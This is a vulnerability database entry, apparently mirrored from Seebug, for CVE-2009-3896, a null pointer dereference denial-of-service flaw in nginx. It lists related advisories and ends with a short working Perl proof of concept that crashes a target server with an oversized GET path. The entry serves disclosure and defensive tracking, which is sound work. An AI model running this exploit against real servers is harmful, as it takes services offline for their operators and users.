Lucene search
K

nginx ngx_http_process_request_headers()函数空指针引用拒绝服务漏洞

🗓️ 27 Nov 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 104 Views

nginx ngx_http_process_request_headers() function null pointer dereference denial of service vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
nginx HTTP Request Header Remote Buffer Overflow
28 Oct 200900:00
nessus
Tenable Nessus
Fedora 12 : nginx-0.7.64-1.fc12 (2009-12750)
8 Dec 200900:00
nessus
Tenable Nessus
Fedora 10 : nginx-0.7.64-1.fc10 (2009-12775)
8 Dec 200900:00
nessus
Tenable Nessus
Fedora 11 : nginx-0.7.64-1.fc11 (2009-12782)
8 Dec 200900:00
nessus
Tenable Nessus
GLSA-201203-22 : nginx: Multiple vulnerabilities
21 Jun 201200:00
nessus
Tenable Nessus
nginx HTTP Request Multiple Vulnerabilities
24 Sep 200900:00
nessus
CVE
CVE-2009-3896
24 Nov 200917:00
cve
Cvelist
CVE-2009-3896
24 Nov 200917:00
cvelist
Debian CVE
CVE-2009-3896
24 Nov 200917:00
debiancve
EUVD
EUVD-2009-3867
7 Oct 202500:30
euvd
Rows per page

                                                here is POC:

#!/usr/bin/perl
use IO::Socket;
if ($#ARGV != 0) {
print "Usage: ./nginx.pl <hostname>\n";
exit;}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
$mysize = 4079;
$mymsg = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";

while(<$sock>) {
print;
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation